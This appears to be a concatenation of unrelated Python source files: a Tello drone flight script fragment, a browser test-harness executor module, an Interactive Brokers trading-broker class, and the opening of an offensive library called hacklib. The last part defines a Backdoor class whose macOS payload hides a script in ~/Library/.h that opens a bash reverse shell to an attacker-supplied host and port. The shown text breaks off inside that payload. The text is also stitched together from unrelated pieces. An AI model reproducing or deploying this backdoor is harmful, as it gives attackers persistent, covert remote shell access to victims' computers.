sleep(1)
tello.send_command('right 200')
sleep(1)
tello.send_command('land')
'''
def _telloB():
tello = Tello('192.168.50.201',9000)
tello.send_command('command')
sleep(0.1)
tello.send_command('speed 80')
sleep(0.1)
tello.send_command('battery?')
sleep(0.1)
tello.send_command('takeoff')
sleep(2)
tello.send_command('up 50')
sleep(1)
tello.send_command('forward 300')
sleep(1)
tello.send_command('left 250')
sleep(1)
tello.send_command('right 250')
sleep(1)
tello.send_command('back 300')
sleep(1)
tello.send_command('land')
'''
def main():
print('start :)')
thread_telloA = threading.Thread(target=_telloA, name='T1')
thread_telloA.start()
'''
sleep(3)
thread_telloB = threading.Thread(target=_telloB, name='T2')
thread_telloB.start()
'''
if __name__ == '__main__':
main()
|
base.py
|
import base64
import hashlib
from six.moves.http_client import HTTPConnection
import io
import json
import os
import threading
import traceback
import socket
import sys
from six.moves.urllib.parse import urljoin, urlsplit, urlunsplit
from abc import ABCMeta, abstractmethod
from ..testrunner import Stop
from .protocol import Protocol, BaseProtocolPart
here = os.path.split(__file__)[0]
def executor_kwargs(test_type, server_config, cache_manager, run_info_data,
**kwargs):
timeout_multiplier = kwargs["timeout_multiplier"]
if timeout_multiplier is None:
timeout_multiplier = 1
executor_kwargs = {"server_config": server_config,
"timeout_multiplier": timeout_multiplier,
"debug_info": kwargs["debug_info"]}
if test_type == "reftest":
executor_kwargs["screenshot_cache"] = cache_manager.dict()
if test_type == "wdspec":
executor_kwargs["binary"] = kwargs.get("binary")
executor_kwargs["webdriver_binary"] = kwargs.get("webdriver_binary")
executor_kwargs["webdriver_args"] = kwargs.get("webdriver_args")
return executor_kwargs
def strip_server(url):
"""Remove the scheme and netloc from a url, leaving only the path and any query
or fragment.
url - the url to strip
e.g. http://example.org:8000/tests?id=1#2 becomes /tests?id=1#2"""
url_parts = list(urlsplit(url))
url_parts[0] = ""
url_parts[1] = ""
return urlunsplit(url_parts)
class TestharnessResultConverter(object):
harness_codes = {0: "OK",
1: "ERROR",
2: "TIMEOUT",
3: "PRECONDITION_FAILED"}
test_codes = {0: "PASS",
1: "FAIL",
2: "TIMEOUT",
3: "NOTRUN",
4: "PRECONDITION_FAILED"}
def __call__(self, test, result, extra=None):
"""Convert a JSON result into a (TestResult, [SubtestResult]) tuple"""
result_url, status, message, stack, subtest_results = result
assert result_url == test.url, ("Got results from %s, expected %s" %
(result_url, test.url))
harness_result = test.result_cls(self.harness_codes[status], message, extra=extra, stack=stack)
return (harness_result,
[test.subtest_result_cls(st_name, self.test_codes[st_status], st_message, st_stack)
for st_name, st_status, st_message, st_stack in subtest_results])
testharness_result_converter = TestharnessResultConverter()
def hash_screenshot(data):
"""Computes the sha1 checksum of a base64-encoded screenshot."""
return hashlib.sha1(base64.b64decode(data)).hexdigest()
def _ensure_hash_in_reftest_screenshots(extra):
"""Make sure reftest_screenshots have hashes.
Marionette internal reftest runner does not produce hashes.
"""
log_data = extra.get("reftest_screenshots")
if not log_data:
return
for item in log_data:
if type(item) != dict:
# Skip relation strings.
continue
if "hash" not in item:
item["hash"] = hash_screenshot(item["screenshot"])
def reftest_result_converter(self, test, result):
extra = result.get("extra", {})
_ensure_hash_in_reftest_screenshots(extra)
return (test.result_cls(
result["status"],
result["message"],
extra=extra,
stack=result.get("stack")), [])
def pytest_result_converter(self, test, data):
harness_data, subtest_data = data
if subtest_data is None:
subtest_data = []
harness_result = test.result_cls(*harness_data)
subtest_results = [test.subtest_result_cls(*item) for item in subtest_data]
return (harness_result, subtest_results)
class ExecutorException(Exception):
def __init__(self, status, message):
self.status = status
self.message = message
class TimedRunner(object):
def __init__(self, logger, func, protocol, url, timeout, extra_timeout):
self.func = func
self.result = None
self.protocol = protocol
self.url = url
self.timeout = timeout
self.extra_timeout = extra_timeout
self.result_flag = threading.Event()
def run(self):
if self.set_timeout() is Stop:
return Stop
if self.before_run() is Stop:
return Stop
executor = threading.Thread(target=self.run_func)
executor.start()
# Add twice the timeout multiplier since the called function is expected to
# wait at least self.timeout + self.extra_timeout and this gives some leeway
finished = self.result_flag.wait(self.timeout + 2 * self.extra_timeout)
if self.result is None:
if finished:
# flag is True unless we timeout; this *shouldn't* happen, but
# it can if self.run_func fails to set self.result due to raising
self.result = False, ("INTERNAL-ERROR", "%s.run_func didn't set a result" %
self.__class__.__name__)
else:
message = "Executor hit external timeout (this may indicate a hang)\n"
# get a traceback for the current stack of the executor thread
message += "".join(traceback.format_stack(sys._current_frames()[executor.ident]))
self.result = False, ("EXTERNAL-TIMEOUT", message)
elif self.result[1] is None:
# We didn't get any data back from the test, so check if the
# browser is still responsive
if self.protocol.is_alive:
self.result = False, ("INTERNAL-ERROR", None)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
return self.result
def set_timeout(self):
raise NotImplementedError
def before_run(self):
pass
def run_func(self):
raise NotImplementedError
class TestExecutor(object):
"""Abstract Base class for object that actually executes the tests in a
specific browser. Typically there will be a different TestExecutor
subclass for each test type and method of executing tests.
:param browser: ExecutorBrowser instance providing properties of the
browser that will be tested.
:param server_config: Dictionary of wptserve server configuration of the
form stored in TestEnvironment.config
:param timeout_multiplier: Multiplier relative to base timeout to use
when setting test timeout.
"""
__metaclass__ = ABCMeta
test_type = None
convert_result = None
supports_testdriver = False
supports_jsshell = False
# Extra timeout to use after internal test timeout at which the harness
# should force a timeout
extra_timeout = 5 # seconds
def __init__(self, browser, server_config, timeout_multiplier=1,
debug_info=None, **kwargs):
self.runner = None
self.browser = browser
self.server_config = server_config
self.timeout_multiplier = timeout_multiplier
self.debug_info = debug_info
self.last_environment = {"protocol": "http",
"prefs": {}}
self.protocol = None # This must be set in subclasses
@property
def logger(self):
"""StructuredLogger for this executor"""
if self.runner is not None:
return self.runner.logger
def setup(self, runner):
"""Run steps needed before tests can be started e.g. connecting to
browser instance
:param runner: TestRunner instance that is going to run the tests"""
self.runner = runner
if self.protocol is not None:
self.protocol.setup(runner)
def teardown(self):
"""Run cleanup steps after tests have finished"""
if self.protocol is not None:
self.protocol.teardown()
def reset(self):
"""Re-initialize internal state to facilitate repeated test execution
as implemented by the `--rerun` command-line argument."""
pass
def run_test(self, test):
"""Run a particular test.
:param test: The test to run"""
if test.environment != self.last_environment:
self.on_environment_change(test.environment)
try:
result = self.do_test(test)
except Exception as e:
self.logger.warning(traceback.format_exc(e))
result = self.result_from_exception(test, e)
if result is Stop:
return result
# log result of parent test
if result[0].status == "ERROR":
self.logger.debug(result[0].message)
self.last_environment = test.environment
self.runner.send_message("test_ended", test, result)
def server_url(self, protocol):
return "%s://%s:%s" % (protocol,
self.server_config["browser_host"],
self.server_config["ports"][protocol][0])
def test_url(self, test):
return urljoin(self.server_url(test.environment["protocol"]), test.url)
@abstractmethod
def do_test(self, test):
"""Test-type and protocol specific implementation of running a
specific test.
:param test: The test to run."""
pass
def on_environment_change(self, new_environment):
pass
def result_from_exception(self, test, e):
if hasattr(e, "status") and e.status in test.result_cls.statuses:
status = e.status
else:
status = "INTERNAL-ERROR"
message = unicode(getattr(e, "message", ""))
if message:
message += "\n"
message += traceback.format_exc(e)
return test.result_cls(status, message), []
def wait(self):
self.protocol.base.wait()
class TestharnessExecutor(TestExecutor):
convert_result = testharness_result_converter
class RefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
def __init__(self, browser, server_config, timeout_multiplier=1, screenshot_cache=None,
debug_info=None, **kwargs):
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.screenshot_cache = screenshot_cache
class RefTestImplementation(object):
def __init__(self, executor):
self.timeout_multiplier = executor.timeout_multiplier
self.executor = executor
# Cache of url:(screenshot hash, screenshot). Typically the
# screenshot is None, but we set this value if a test fails
# and the screenshot was taken from the cache so that we may
# retrieve the screenshot from the cache directly in the future
self.screenshot_cache = self.executor.screenshot_cache
self.message = None
def setup(self):
pass
def teardown(self):
pass
@property
def logger(self):
return self.executor.logger
def get_hash(self, test, viewport_size, dpi):
key = (test.url, viewport_size, dpi)
if key not in self.screenshot_cache:
success, data = self.executor.screenshot(test, viewport_size, dpi)
if not success:
return False, data
screenshot = data
hash_value = hash_screenshot(data)
self.screenshot_cache[key] = (hash_value, screenshot)
rv = (hash_value, screenshot)
else:
rv = self.screenshot_cache[key]
self.message.append("%s %s" % (test.url, rv[0]))
return True, rv
def reset(self):
self.screenshot_cache.clear()
def is_pass(self, hashes, screenshots, relation, fuzzy):
assert relation in ("==", "!=")
if not fuzzy or fuzzy == ((0,0), (0,0)):
equal = hashes[0] == hashes[1]
# sometimes images can have different hashes, but pixels can be identical.
if not equal:
self.logger.info("Image hashes didn't match, checking pixel differences")
max_per_channel, pixels_different = self.get_differences(screenshots)
equal = pixels_different == 0 and max_per_channel == 0
else:
max_per_channel, pixels_different = self.get_differences(screenshots)
allowed_per_channel, allowed_different = fuzzy
self.logger.info("Allowed %s pixels different, maximum difference per channel %s" %
("-".join(str(item) for item in allowed_different),
"-".join(str(item) for item in allowed_per_channel)))
equal = ((pixels_different == 0 and allowed_different[0] == 0) or
(max_per_channel == 0 and allowed_per_channel[0] == 0) or
(allowed_per_channel[0] <= max_per_channel <= allowed_per_channel[1] and
allowed_different[0] <= pixels_different <= allowed_different[1]))
return equal if relation == "==" else not equal
def get_differences(self, screenshots):
from PIL import Image, ImageChops, ImageStat
lhs = Image.open(io.BytesIO(base64.b64decode(screenshots[0]))).convert("RGB")
rhs = Image.open(io.BytesIO(base64.b64decode(screenshots[1]))).convert("RGB")
diff = ImageChops.difference(lhs, rhs)
minimal_diff = diff.crop(diff.getbbox())
mask = minimal_diff.convert("L", dither=None)
stat = ImageStat.Stat(minimal_diff, mask)
per_channel = max(item[1] for item in stat.extrema)
count = stat.count[0]
self.logger.info("Found %s pixels different, maximum difference per channel %s" %
(count, per_channel))
return per_channel, count
def run_test(self, test):
viewport_size = test.viewport_size
dpi = test.dpi
self.message = []
# Depth-first search of reference tree, with the goal
# of reachings a leaf node with only pass results
stack = list(((test, item[0]), item[1]) for item in reversed(test.references))
while stack:
hashes = [None, None]
screenshots = [None, None]
nodes, relation = stack.pop()
fuzzy = self.get_fuzzy(test, nodes, relation)
for i, node in enumerate(nodes):
success, data = self.get_hash(node, viewport_size, dpi)
if success is False:
return {"status": data[0], "message": data[1]}
hashes[i], screenshots[i] = data
if self.is_pass(hashes, screenshots, relation, fuzzy):
fuzzy = self.get_fuzzy(test, nodes, relation)
if nodes[1].references:
stack.extend(list(((nodes[1], item[0]), item[1]) for item in reversed(nodes[1].references)))
else:
# We passed
return {"status":"PASS", "message": None}
# We failed, so construct a failure message
for i, (node, screenshot) in enumerate(zip(nodes, screenshots)):
if screenshot is None:
success, screenshot = self.retake_screenshot(node, viewport_size, dpi)
if success:
screenshots[i] = screenshot
log_data = [
{"url": nodes[0].url, "screenshot": screenshots[0], "hash": hashes[0]},
relation,
{"url": nodes[1].url, "screenshot": screenshots[1], "hash": hashes[1]},
]
return {"status": "FAIL",
"message": "\n".join(self.message),
"extra": {"reftest_screenshots": log_data}}
def get_fuzzy(self, root_test, test_nodes, relation):
full_key = tuple([item.url for item in test_nodes] + [relation])
ref_only_key = test_nodes[1].url
fuzzy_override = root_test.fuzzy_override
fuzzy = test_nodes[0].fuzzy
sources = [fuzzy_override, fuzzy]
keys = [full_key, ref_only_key, None]
value = None
for source in sources:
for key in keys:
if key in source:
value = source[key]
break
if value:
break
return value
def retake_screenshot(self, node, viewport_size, dpi):
success, data = self.executor.screenshot(node, viewport_size, dpi)
if not success:
return False, data
key = (node.url, viewport_size, dpi)
hash_val, _ = self.screenshot_cache[key]
self.screenshot_cache[key] = hash_val, data
return True, data
class WdspecExecutor(TestExecutor):
convert_result = pytest_result_converter
protocol_cls = None
def __init__(self, browser, server_config, webdriver_binary,
webdriver_args, timeout_multiplier=1, capabilities=None,
debug_info=None, **kwargs):
self.do_delayed_imports()
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.webdriver_binary = webdriver_binary
self.webdriver_args = webdriver_args
self.timeout_multiplier = timeout_multiplier
self.capabilities = capabilities
self.protocol = self.protocol_cls(self, browser)
def is_alive(self):
return self.protocol.is_alive
def on_environment_change(self, new_environment):
pass
def do_test(self, test):
timeout = test.timeout * self.timeout_multiplier + self.extra_timeout
success, data = WdspecRun(self.do_wdspec,
self.protocol.session_config,
test.abs_path,
timeout).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_wdspec(self, session_config, path, timeout):
return pytestrunner.run(path,
self.server_config,
session_config,
timeout=timeout)
def do_delayed_imports(self):
global pytestrunner
from . import pytestrunner
class WdspecRun(object):
def __init__(self, func, session, path, timeout):
self.func = func
self.result = (None, None)
self.session = session
self.path = path
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
"""Runs function in a thread and interrupts it if it exceeds the
given timeout. Returns (True, (Result, [SubtestResult ...])) in
case of success, or (False, (status, extra information)) in the
event of failure.
"""
executor = threading.Thread(target=self._run)
executor.start()
self.result_flag.wait(self.timeout)
if self.result[1] is None:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.session, self.path, self.timeout)
except (socket.timeout, IOError):
self.result = False, ("CRASH", None)
except Exception as e:
message = getattr(e, "message")
if message:
message += "\n"
message += traceback.format_exc(e)
self.result = False, ("INTERNAL-ERROR", message)
finally:
self.result_flag.set()
class ConnectionlessBaseProtocolPart(BaseProtocolPart):
def execute_script(self, script, asynchronous=False):
pass
def set_timeout(self, timeout):
pass
def wait(self):
pass
def set_window(self, handle):
pass
class ConnectionlessProtocol(Protocol):
implements = [ConnectionlessBaseProtocolPart]
def connect(self):
pass
def after_connect(self):
pass
class WebDriverProtocol(Protocol):
server_cls = None
implements = [ConnectionlessBaseProtocolPart]
def __init__(self, executor, browser):
Protocol.__init__(self, executor, browser)
self.webdriver_binary = executor.webdriver_binary
self.webdriver_args = executor.webdriver_args
self.capabilities = self.executor.capabilities
self.session_config = None
self.server = None
def connect(self):
"""Connect to browser via the HTTP server."""
self.server = self.server_cls(
self.logger,
binary=self.webdriver_binary,
args=self.webdriver_args)
self.server.start(block=False)
self.logger.info(
"WebDriver HTTP server listening at %s" % self.server.url)
self.session_config = {"host": self.server.host,
"port": self.server.port,
"capabilities": self.capabilities}
def after_connect(self):
pass
def teardown(self):
if self.server is not None and self.server.is_alive:
self.server.stop()
@property
def is_alive(self):
"""Test that the connection is still alive.
Because the remote communication happens over HTTP we need to
make an explicit request to the remote. It is allowed for
WebDriver spec tests to not have a WebDriver session, since this
may be what is tested.
An HTTP request to an invalid path that results in a 404 is
proof enough to us that the server is alive and kicking.
"""
conn = HTTPConnection(self.server.host, self.server.port)
conn.request("HEAD", self.server.base_path + "invalid")
res = conn.getresponse()
return res.status == 404
class CallbackHandler(object):
"""Handle callbacks from testdriver-using tests.
The default implementation here makes sense for things that are roughly like
WebDriver. Things that are more different to WebDriver may need to create a
fully custom implementation."""
def __init__(self, logger, protocol, test_window):
self.protocol = protocol
self.test_window = test_window
self.logger = logger
self.callbacks = {
"action": self.process_action,
"complete": self.process_complete
}
self.actions = {
"click": ClickAction(self.logger, self.protocol),
"send_keys": SendKeysAction(self.logger, self.protocol),
"action_sequence": ActionSequenceAction(self.logger, self.protocol),
"generate_test_report": GenerateTestReportAction(self.logger, self.protocol),
"add_virtual_authenticator": AddVirtualAuthenticatorAction(self.logger, self.protocol),
"remove_virtual_authenticator": RemoveVirtualAuthenticatorAction(self.logger, self.protocol),
"add_credential": AddCredentialAction(self.logger, self.protocol),
"get_credentials": GetCredentialsAction(self.logger, self.protocol),
"remove_credential": RemoveCredentialAction(self.logger, self.protocol),
"remove_all_credentials": RemoveAllCredentialsAction(self.logger, self.protocol),
"set_user_verified": SetUserVerifiedAction(self.logger, self.protocol),
}
def __call__(self, result):
url, command, payload = result
self.logger.debug("Got async callback: %s" % result[1])
try:
callback = self.callbacks[command]
except KeyError:
raise ValueError("Unknown callback type %r" % result[1])
return callback(url, payload)
def process_complete(self, url, payload):
rv = [strip_server(url)] + payload
return True, rv
def process_action(self, url, payload):
action = payload["action"]
self.logger.debug("Got action: %s" % action)
try:
action_handler = self.actions[action]
except KeyError:
raise ValueError("Unknown action %s" % action)
try:
result = action_handler(payload)
except Exception:
self.logger.warning("Action %s failed" % action)
self.logger.warning(traceback.format_exc())
self._send_message("complete", "error")
raise
else:
self.logger.debug("Action %s completed with result %s" % (action, result))
return_message = {"result": result}
self._send_message("complete", "success", json.dumps(return_message))
return False, None
def _send_message(self, message_type, status, message=None):
self.protocol.testdriver.send_message(message_type, status, message=message)
class ClickAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
selector = payload["selector"]
element = self.protocol.select.element_by_selector(selector)
self.logger.debug("Clicking element: %s" % selector)
self.protocol.click.element(element)
class SendKeysAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
selector = payload["selector"]
keys = payload["keys"]
element = self.protocol.select.element_by_selector(selector)
self.logger.debug("Sending keys to element: %s" % selector)
self.protocol.send_keys.send_keys(element, keys)
class ActionSequenceAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
# TODO: some sort of shallow error checking
actions = payload["actions"]
for actionSequence in actions:
if actionSequence["type"] == "pointer":
for action in actionSequence["actions"]:
if (action["type"] == "pointerMove" and
isinstance(action["origin"], dict)):
action["origin"] = self.get_element(action["origin"]["selector"], action["frame"]["frame"])
self.protocol.action_sequence.send_actions({"actions": actions})
def get_element(self, element_selector, frame):
element = self.protocol.select.element_by_selector(element_selector, frame)
return element
class GenerateTestReportAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
message = payload["message"]
self.logger.debug("Generating test report: %s" % message)
self.protocol.generate_test_report.generate_test_report(message)
class AddVirtualAuthenticatorAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
self.logger.debug("Adding virtual authenticator")
config = payload["config"]
authenticator_id = self.protocol.virtual_authenticator.add_virtual_authenticator(config)
self.logger.debug("Authenticator created with ID %s" % authenticator_id)
return authenticator_id
class RemoveVirtualAuthenticatorAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
self.logger.debug("Removing virtual authenticator %s" % authenticator_id)
return self.protocol.virtual_authenticator.remove_virtual_authenticator(authenticator_id)
class AddCredentialAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
credential = payload["credential"]
self.logger.debug("Adding credential to virtual authenticator %s " % authenticator_id)
return self.protocol.virtual_authenticator.add_credential(authenticator_id, credential)
class GetCredentialsAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
self.logger.debug("Getting credentials from virtual authenticator %s " % authenticator_id)
return self.protocol.virtual_authenticator.get_credentials(authenticator_id)
class RemoveCredentialAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
credential_id = payload["credential_id"]
self.logger.debug("Removing credential %s from authenticator %s" % (credential_id, authenticator_id))
return self.protocol.virtual_authenticator.remove_credential(authenticator_id, credential_id)
class RemoveAllCredentialsAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
self.logger.debug("Removing all credentials from authenticator %s" % authenticator_id)
return self.protocol.virtual_authenticator.remove_all_credentials(authenticator_id)
class SetUserVerifiedAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
uv = payload["uv"]
self.logger.debug(
"Setting user verified flag on authenticator %s to %s" % (authenticator_id, uv["isUserVerified"]))
return self.protocol.virtual_authenticator.set_user_verified(authenticator_id, uv)
|
ib_broker.py
|
# Copyright 2016-present CERN – European Organization for Nuclear Research
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from threading import Thread, Event, Lock
from typing import List, Sequence, Optional, Set
from ibapi.client import EClient
from ibapi.contract import ContractDetails
from ibapi.order import Order as IBOrder
from pandas import to_datetime
from qf_lib.backtesting.broker.broker import Broker
from qf_lib.backtesting.contract.contract_to_ticker_conversion.ib_contract_ticker_mapper import IBContractTickerMapper
from qf_lib.backtesting.order.execution_style import MarketOrder, StopOrder
from qf_lib.backtesting.order.order import Order
from qf_lib.backtesting.order.time_in_force import TimeInForce
from qf_lib.backtesting.portfolio.broker_positon import BrokerPosition
from qf_lib.common.exceptions.broker_exceptions import BrokerException, OrderCancellingException
from qf_lib.common.utils.logging.qf_parent_logger import ib_logger
from qf_lib.containers.dataframe.qf_dataframe import QFDataFrame
from qf_lib.interactive_brokers.ib_contract import IBContract
from qf_lib.interactive_brokers.ib_wrapper import IBWrapper
class IBBroker(Broker):
"""
Interactive Brokers Broker class. Main purpose of this class is to connect to the API of IB broker and send
the orders. It provides the functionality, which allows to retrieve a.o. the currently open positions and the
value of the portfolio.
Parameters
-----------
contract_ticker_mapper: IBContractTickerMapper
mapper which provides the functionality that allows to map a ticker from any data provider
(BloombergTicker, PortaraTicker etc.) onto the contract object from the Interactive Brokers API
clientId: int
id of the Broker client
host: str
IP address
port: int
socket port
"""
def __init__(self, contract_ticker_mapper: IBContractTickerMapper, clientId: int = 0, host: str = "127.0.0.1",
port: int = 7497):
super().__init__(contract_ticker_mapper)
self.logger = ib_logger.getChild(self.__class__.__name__)
# Lock that synchronizes entries into the functions and makes sure we have a synchronous communication
# with the client
self.lock = Lock()
self.orders_placement_lock = Lock()
self.waiting_time = 30 # expressed in seconds
# Lock that informs us that wrapper received the response
self.action_event_lock = Event()
self.wrapper = IBWrapper(self.action_event_lock, contract_ticker_mapper)
self.client = EClient(wrapper=self.wrapper)
self.clientId = clientId
self.client.connect(host, port, self.clientId)
# Run the client in the separate thread so that the execution of the program can go on
# now we will have 3 threads:
# - thread of the main program
# - thread of the client
# - thread of the wrapper
thread = Thread(target=self.client.run)
thread.start()
# This will be released after the client initialises and wrapper receives the nextValidOrderId
if not self._wait_for_results():
raise ConnectionError("IB Broker was not initialized correctly")
def get_portfolio_value(self) -> float:
with self.lock:
request_id = 1
self._reset_action_lock()
self.client.reqAccountSummary(request_id, 'All', 'NetLiquidation')
wait_result = self._wait_for_results()
self.client.cancelAccountSummary(request_id)
if wait_result:
return self.wrapper.net_liquidation
else:
error_msg = 'Time out while getting portfolio value'
self.logger.error(error_msg)
raise BrokerException(error_msg)
def get_portfolio_tag(self, tag: str) -> float:
with self.lock:
request_id = 2
self._reset_action_lock()
self.client.reqAccountSummary(request_id, 'All', tag)
wait_result = self._wait_for_results()
self.client.cancelAccountSummary(request_id)
if wait_result:
return self.wrapper.tmp_value
else:
error_msg = 'Time out while getting portfolio tag: {}'.format(tag)
self.logger.error(error_msg)
raise BrokerException(error_msg)
def get_positions(self) -> List[BrokerPosition]:
with self.lock:
self._reset_action_lock()
self.wrapper.reset_position_list()
self.client.reqPositions()
if self._wait_for_results():
return self.wrapper.position_list
else:
error_msg = 'Time out while getting positions'
self.logger.error(error_msg)
raise BrokerException(error_msg)
def get_liquid_hours(self, contract: IBContract) -> QFDataFrame:
""" Returns a QFDataFrame containing information about liquid hours of the given contract. """
with self.lock:
self._reset_action_lock()
request_id = 3
self.client.reqContractDetails(request_id, contract)
if self._wait_for_results():
contract_details = self.wrapper.contract_details
liquid_hours = contract_details.tradingHours.split(";")
liquid_hours_df = QFDataFrame.from_records(
[hours.split("-") for hours in liquid_hours if not hours.endswith("CLOSED")], columns=["FROM", "TO"]
)
for col in liquid_hours_df.columns:
liquid_hours_df[col] = to_datetime(liquid_hours_df[col], format="%Y%m%d:%H%M")
liquid_hours_df.name = contract_details.contract.symbol
return liquid_hours_df
else:
error_msg = 'Time out while getting contract details'
self.logger.error(error_msg)
raise BrokerException(error_msg)
def get_contract_details(self, contract: IBContract) -> ContractDetails:
with self.lock:
self._reset_action_lock()
request_id = 4
self.client.reqContractDetails(request_id, contract)
if self._wait_for_results():
return self.wrapper.contract_details
else:
error_msg = 'Time out while getting contract details'
self.logger.error(error_msg)
raise BrokerException(error_msg)
def place_orders(self, orders: Sequence[Order]) -> Sequence[int]:
with self.orders_placement_lock:
open_order_ids = {o.id for o in self.get_open_orders()}
order_ids_list = []
for order in orders:
self.logger.info('Placing Order: {}'.format(order))
order_id = self._execute_single_order(order) or self._find_newly_added_order_id(order, open_order_ids)
if order_id is None:
error_msg = f"Not able to place order: {order}"
self.logger.error(error_msg)
raise BrokerException(error_msg)
else:
order_ids_list.append(order_id)
return order_ids_list
def cancel_order(self, order_id: int):
with self.lock:
self.logger.info('Cancel order: {}'.format(order_id))
self._reset_action_lock()
self.wrapper.set_cancel_order_id(order_id)
self.client.cancelOrder(order_id)
if not self._wait_for_results():
error_msg = 'Time out while cancelling order id {} : \n'.format(order_id)
self.logger.error(error_msg)
raise OrderCancellingException(error_msg)
def get_open_orders(self) -> List[Order]:
with self.lock:
self._reset_action_lock()
self.wrapper.reset_order_list()
self.client.reqOpenOrders()
if self._wait_for_results():
return self.wrapper.order_list
else:
error_msg = 'Timeout while getting open orders'
self.logger.error(error_msg)
raise BrokerException(error_msg)
def cancel_all_open_orders(self):
"""
There is no way to check if cancelling of all orders was finished.
One can only get open orders and confirm that the list is empty
"""
with self.lock:
self.client.reqGlobalCancel()
self.logger.info('cancel_all_open_orders')
def stop(self):
""" Stop the Broker client and disconnect from the interactive brokers. """
with self.lock:
self.client.disconnect()
self.logger.info("Disconnecting from the interactive brokers client")
def _find_newly_added_order_id(self, order: Order, order_ids_existing_before: Set[int]):
""" Given the list of order ids open before placing the given order, try to compute the id of the recently
placed order. """
orders_matching_given_order = {o.id for o in self.get_open_orders() if o == order}
order_ids = orders_matching_given_order.difference(order_ids_existing_before)
return next(iter(order_ids)) if len(order_ids) == 1 else None
def _execute_single_order(self, order) -> Optional[int]:
with self.lock:
order_id = self.wrapper.next_order_id()
self._reset_action_lock()
self.wrapper.set_waiting_order_id(order_id)
ib_contract = self.contract_ticker_mapper.ticker_to_contract(order.ticker)
ib_order = self._to_ib_order(order)
self.client.placeOrder(order_id, ib_contract, ib_order)
if self._wait_for_results(10):
return order_id
def _wait_for_results(self, waiting_time: Optional[int] = None) -> bool:
""" Wait for self.waiting_time """
waiting_time = waiting_time or self.waiting_time
wait_result = self.action_event_lock.wait(waiting_time)
return wait_result
def _reset_action_lock(self):
""" threads calling wait() will block until set() is called"""
self.action_event_lock.clear()
def _to_ib_order(self, order: Order):
ib_order = IBOrder()
ib_order.action = 'BUY' if order.quantity > 0 else 'SELL'
ib_order.totalQuantity = abs(order.quantity)
ib_order = self._set_execution_style(ib_order, order.execution_style)
time_in_force = order.time_in_force
tif_str = self._map_to_tif_str(time_in_force)
ib_order.tif = tif_str
return ib_order
def _map_to_tif_str(self, time_in_force):
if time_in_force == TimeInForce.GTC:
tif_str = "GTC"
elif time_in_force == TimeInForce.DAY:
tif_str = "DAY"
elif time_in_force == TimeInForce.OPG:
tif_str = "OPG"
else:
raise ValueError("Not supported TimeInForce {tif:s}".format(tif=str(time_in_force)))
return tif_str
def _set_execution_style(self, ib_order, execution_style):
if isinstance(execution_style, MarketOrder):
ib_order.orderType = "MKT"
elif isinstance(execution_style, StopOrder):
ib_order.orderType = "STP"
ib_order.auxPrice = execution_style.stop_price
return ib_order
|
hacklib.py
|
'''The MIT License (MIT)
Copyright (c) 2016 Leon Li (leon@apolyse.com)
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
associated documentation files (the "Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.'''
import socket
import threading
import time
import urllib2
import os
from Queue import Queue
try: # Import scapy if they have it. If they don't, they can still use hacklib
from scapy.all import *
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Fixes scapy logging error
except:
pass
from string import ascii_uppercase, ascii_lowercase, digits # Import for PatternCreate and PatternOffset
class Backdoor(object):
'''Creates an app carrying a persistent backdoor payload. Currently only for Mac OSX.
Payloads for Windows and Linux coming soon.'''
def __init__(self):
self.IP = ''
self.port = ''
self.osx_payload = '''#!/bin/bash
mkdir ~/Library/.h
echo '#!/bin/bash
bash -i >& /dev/tcp/HOST/PORT 0>&1
wait' > ~/Library/.h/connect.sh
